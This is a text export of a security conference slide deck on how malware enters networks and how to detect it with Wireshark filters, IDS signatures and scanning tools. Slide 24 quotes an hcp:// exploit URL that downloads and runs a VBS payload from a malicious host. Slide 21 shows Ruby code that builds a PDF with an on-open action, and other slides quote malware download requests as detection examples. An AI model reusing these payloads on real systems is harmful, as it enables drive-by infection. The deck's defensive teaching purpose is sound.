Taming worms, rats, dragons & more
1. An Intel company
‘Taming Worms, RATs, Dragons, Zombies & More…’
By Christiaan Beek
2. Agenda
• whoami
• The game has changed
• How malware enters your network
• What goes wrong
• Wireshark Kung-Fu
• Countermeasures
• Resources & credits
• Wrap up
LEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this presentation.
3. > whoami
• Christiaan Beek
• Principal Architect
• Foundstone EMEA IR & Forensics
• Developer/Instructor MFIRE
4. The game has changed
(Slide graphic: word cloud of today's attack surface and notable threats: manufacturing, medical devices, energy, databases, SCADA, mobile, embedded, silicon, smart cars, ATM/kiosk, apps, entertainment, virtual, RF/IR, Bluetooth, web, social media; RSA, DuQu, Night Dragon, Stuxnet, Aurora, Zeus.)
5. The game has changed
(Chart: Total Malware Samples, y-axis 0 to 70,000,000. Source: McAfee threat landscape Q2 report.)
7. Some statistics
The Gulf region is drawing the interest of malware authors:
• Number of internet users growing
• Windows XP most used OS
• Vulnerable IE or PDF readers
8. Some statistics
Did you know:
• Internet Explorer 6 has more than 473 publicly known vulnerabilities
• So…
17. How malware enters your network
Hint:
‘it is between the keyboard and the chair’
18. How malware enters your network
Top infection vectors:
• Users browsing websites that have been infected, with no outward sign of the compromise
• Opening attachments
• Or:
21. How malware enters your network
With a little effort…
# Create a simple PDF document with Origami
require 'origami'
include Origami

contents = ContentStream.new
contents.write 'Black Hat Sneak Peek',
  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15
PDF.new.append_page(Page.new.setContents(contents)).save('Sneak peek.pdf')

# Re-open the file and attach an action that fires when the document is opened
pdf = PDF.read('Sneak peek.pdf')
pdf.onDocumentOpen Action::URI.new('http://securitybananas.com')
pdf.save('Sneak peek bhat.pdf')
22. How malware enters your network
After x redirects, a script is executed that grabs information about the visitor's system.
23. How malware enters your network
24. How malware enters your network
hcp://services/search?query=anything&topic=hcp://system/sysinf
o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0
03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c
echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP")
:.open
"GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16
6::60&d=0::0",false:.send():Set A =
CreateObject("Scripting.FileSystemObject"):Set
D=A.CreateTextFile(A.GetSpecialFolder(2) + "" +
B):D.WriteLine .responseText:End
With:D.Close:CreateObject("WScript.Shell").Run
A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs &&
%TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
25. How malware enters your network
Info sent:
Browser version
Operating System
Adobe version
Flash version
Java version
Etc.
26. How malware enters your network
var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0];
try {var PluginDetect = {handler : function (c, b, a){return function (){c(b, a)}
[………….]
initScript:function(){var c=this,a=navigator,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win. * CE",22.1,"Win. * Mobile",22.2,"Pocket s * PC",22.3,"
27. How malware enters your network
Info gathered:
Browser version
Operating System
Adobe version
Flash version
Java version
Etc.
30. How malware traffic is hiding
► Techniques used to hide traffic:
• Disguising malicious traffic as web traffic
• Shortened or encoded URLs
• IRC over HTTP
39. Custom/targeted malware
► Some recent samples of malware:
• Spreading via shares, USB media and .exe infection
• Searches for autocomplete information
• Searches for specific accounts
• Keylogger
• Creates a task to check whether the keylogger is running
• Masked in DLL files
• Uploads results to FTP servers
43. Wireshark
Which filters can be used?
First: tcp.dstport == 80 and http contains "GET"
After analyzing this output, fine-tune the filter:
tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
44. Wireshark
► Which filters can be used?
DNS queries:
dns contains "ru" or dns contains "cn" or dns contains "biz" or dns contains "dyndns.org" or dns contains "cc"
45. TShark
► TShark command line:
47. Custom/targeted malware
► Chinese Gh0st RAT
• Full analysis by Foundstone's Michael G. Spohn
• Example of a Chinese RAT used in several campaigns
• Research project to understand how it works
49. Custom/targeted malware
► Network analysis of Chinese Gh0st RAT
• Command & Control (C2) packets consist of:
1. A five-byte packet header containing the characters ‘Gh0st’.
2. A four-byte integer containing the size in bytes of the entire packet.
3. A four-byte integer containing the size in bytes of the entire packet when uncompressed.
4. A variable-sized packet payload.
The client sends small requests that contain commands, and the server responds to those commands with the requested data.
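An added example, not from the slides or from Michael Spohn's analysis, that parses the header layout above in Python and walks a reassembled stream for C2 packets. It assumes little-endian length fields and a zlib-compressed payload, neither of which the slide states; the sample packets are constructed by build_gh0st purely to exercise the parser.

```python
import struct
import zlib

MAGIC = b"Gh0st"          # five-byte header described on the slide
HEADER_LEN = 5 + 4 + 4    # magic + total size + uncompressed size

def build_gh0st(payload: bytes) -> bytes:
    """Constructed packet in the slide's layout, used here only to exercise the parser."""
    body = zlib.compress(payload)  # compression algorithm is an assumption
    return MAGIC + struct.pack("<II", HEADER_LEN + len(body), len(payload)) + body

def parse_gh0st(data: bytes):
    """Return (payload, total_len) for a well-formed packet at data[0], else None."""
    if len(data) < HEADER_LEN or not data.startswith(MAGIC):
        return None
    total_len, uncompressed_len = struct.unpack_from("<II", data, len(MAGIC))
    # Both length fields come off the wire: bound them before slicing or inflating.
    if total_len < HEADER_LEN or total_len > len(data):
        return None
    try:
        payload = zlib.decompress(data[HEADER_LEN:total_len])
    except zlib.error:
        return None
    if len(payload) != uncompressed_len:
        return None   # header disagrees with the data: not Gh0st, or a tampered packet
    return payload, total_len

def scan_stream(stream: bytes):
    """Walk a reassembled TCP stream and collect every decoded Gh0st payload."""
    hits, offset = [], 0
    while (idx := stream.find(MAGIC, offset)) != -1:
        parsed = parse_gh0st(stream[idx:])
        if parsed is None:
            offset = idx + 1          # the magic string appeared by chance; keep looking
            continue
        hits.append(parsed[0])
        offset = idx + parsed[1]
    return hits

if __name__ == "__main__":
    # Constructed stream: noise, a valid packet, a false magic hit, a second packet
    sample = b"noise" + build_gh0st(b"\x01LOGIN") + b"Gh0stXX" + build_gh0st(b"\x02PING")
    for p in scan_stream(sample):
        print(p)
```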
61. Wireshark
►SMB worm creating .exe on share:
smb.create.action == 2 and smb.file contains "exe"
62. Wireshark
► SMB .exe detection:
In the old days: smb.file contains "exe"
63. Wireshark
► SMB .exe detection:
Taddong developed a tool to capture SMB objects in Wireshark
But… good news
It's now integrated in Wireshark version 1.5.1 (dev)
64. Wireshark
► SMB .exe detection:
File > Export > Objects > SMB
65. Wireshark
► SMB .exe detection:
70. Countermeasures
► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet):
RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|"
TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|"
VNC = "|52 46 42 20 30 30 33 2e 30 30|"
71. Countermeasures
► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls:
CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|";
► Implement new signatures in IDS/DLP as they are learned
72. Countermeasures
► Detect services on non-standard ports
► Nmap the internal network:
nmap -sS -p <ports> -oG results.nmap <IP or subnet range>
73. Countermeasures
► Detect services on non-standard ports
► Probe discovered ports with Amap:
amap -A -b -o out.amap <IP> <port> <port> ...
or use the results.nmap file as input
74. Countermeasures
► Implement IDS/HIPS/DLP rules to detect outbound GET requests:
Files by type (.exe, .bat, .dll etc.) in URL
GET http://scan28.dosmokes.ce.ms/InstallSystemDefender_133.bin HTTP/1.0
GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.45094.exe HTTP/1.1
75. Countermeasures
► Implement IDS/HIPS/DLP rules to detect encoded URL extensions:
76. Countermeasures
► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions:
GET http://65.75.156.141/Home/d.php?f=16&e=about.exe HTTP/1.1
GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm91dC5leGU== HTTP/1.1
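An added example, not part of the deck, that applies the checks from the three GET-request slides above to sample request lines: executable file types in the path or query, long hex-encoded parameters, and Base64 parameters that decode to an executable name. The host names in the sample lines are constructed placeholders, and the .bin and .scr extensions are added on top of the slide's list as assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# File types named on the slide (.exe, .bat, .dll etc.); .bin and .scr are assumptions
EXEC_EXT = re.compile(r"\.(exe|bat|dll|bin|scr)(?![A-Za-z0-9])", re.IGNORECASE)
GET_LINE = re.compile(r"^GET\s+(\S+)\s+HTTP/1\.[01]$")
HEX_TOKEN = re.compile(r"^[0-9A-Fa-f]{32,}$")          # long hex blob in a parameter
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")   # Base64 blob in a parameter

def decode_base64(token):
    """Decode a Base64 parameter leniently (normalise padding); return ASCII text or None."""
    token = token.rstrip("=")
    token += "=" * (-len(token) % 4)
    try:
        return base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None

def classify_get(line):
    """Return a detection label for one HTTP request line, or None if nothing matched."""
    m = GET_LINE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if EXEC_EXT.search(unquote(parts.path)):
        return "exec-in-path"
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if EXEC_EXT.search(value):
            return "exec-in-query"
        if HEX_TOKEN.match(value):            # check hex before Base64: hex is valid Base64
            return "hex-encoded-query"
        if B64_TOKEN.match(value):
            decoded = decode_base64(value)
            if decoded and EXEC_EXT.search(decoded):
                return "exec-in-base64-query"
    return None

# Constructed sample request lines (hosts are placeholders, not real sites)
SAMPLE_REQUESTS = [
    "GET http://dl.example.invalid/InstallSystemDefender_133.bin HTTP/1.0",
    "GET http://dl.example.invalid/Home/d.php?f=16&e=about.exe HTTP/1.1",
    "GET http://dl.example.invalid/Home/d.php?f=MTYmZT1hYm91dC5leGU= HTTP/1.1",
    "GET http://dl.example.invalid/get2.php?c=PXWSQSZT&d=26606B67393230312E64636F317E3E3D2120 HTTP/1.1",
    "GET http://www.example.invalid/index.html HTTP/1.1",
]

def scan_requests(lines):
    """Return (line, label) for every request line that trips a rule."""
    return [(l, classify_get(l)) for l in lines if classify_get(l)]
```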
77. Wrap up
► What have you learned?
• The game has changed
• Malware uses all kinds of ways to hide itself
• Many tools exist to detect malware
• But…
• Invest in learning the tools and how malware works
• Define a defense-in-depth malware strategy
• Create awareness
• Educate administrators AND management AND users
78. Resources & credits
► Resources
• Wireshark (http://www.wireshark.org)
• Snort (http://www.sourcefire.com)
• Nmap (http://www.insecure.org)
• Amap (http://www.thc.org/thc-amap/)
► Special thanks to
• Michael G. Spohn
• Shane Shook
• Tony Lee
• Carric Dooley
79. Shukran/Thank you!
► Keep in touch:
• Christiaan_Beek @McAfee dot com
► Twitter:
• @FSEMEA
• @Foundstone
• @ChristaanBeek